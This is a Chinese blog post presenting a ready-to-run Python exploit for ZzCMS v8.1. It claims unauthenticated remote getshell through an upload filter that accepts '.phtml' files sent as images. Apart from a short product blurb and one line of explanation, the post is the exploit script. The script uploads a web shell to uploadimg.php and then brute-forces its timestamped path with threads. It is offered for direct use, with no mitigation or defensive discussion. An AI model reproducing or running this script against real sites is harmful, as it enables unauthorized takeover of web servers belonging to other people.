ZzCMS v8.1 前台无条件Getshell

  • A+
所属分类:颓废's Blog
摘要

zzcms某处过滤不严格,导致可上传任意脚本文件 直接贴出exp

站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。

zzcms某处过滤不严格,导致可上传任意脚本文件

ZzCMS v8.1 前台无条件Getshell

直接贴出exp

# -*- coding:utf-8 -*-  import requests import threading import time import argparse parser = argparse.ArgumentParser() parser.add_argument("-u") args = parser.parse_args() urls = args.u urlib = urls+'uploadimg.php' def B(url):     try:         if requests.get(url,timeout=3).status_code == 200:             lock.acquire()             print u"[+++] shell地址:", url             lock.release()     except:         pass def L(url,filename):  print u'[+++] ADMINSS:正在尝试上传shell'  try:   urls = '%s'%url   files = {'g_fu_image[]': ('%s'%filename, open('%s'%filename, 'rb'), 'image/jpg', {'Expires': '0'})}   r = requests.post(urls, files=files)   fname = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))   froot = '/uploadfiles/'+time.strftime('%Y-%m',time.localtime(time.time()))+'/'   upfrt = urls+froot+fname   shll =  upfrt.replace('uploadimg.php/', '')   return shll   except:   bugs = u'[+++]ERROR:文件上传失败'   print bugs print '[+++] ADMINSS:'+urls shel = L(urlib,'1.phtml') shell = shel print u'[+++] ADMINSS:上传成功 正在爆破shell地址' lock = threading.Lock() pool = [] for x in xrange(100, 999):     pool.append(threading.Thread(target=B, args=(shell+str(x)+'.phtml',)))     if len(pool) > 20 or x == 998:         for x in pool:             x.start()         for x in pool:             x.join()         pool = []

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: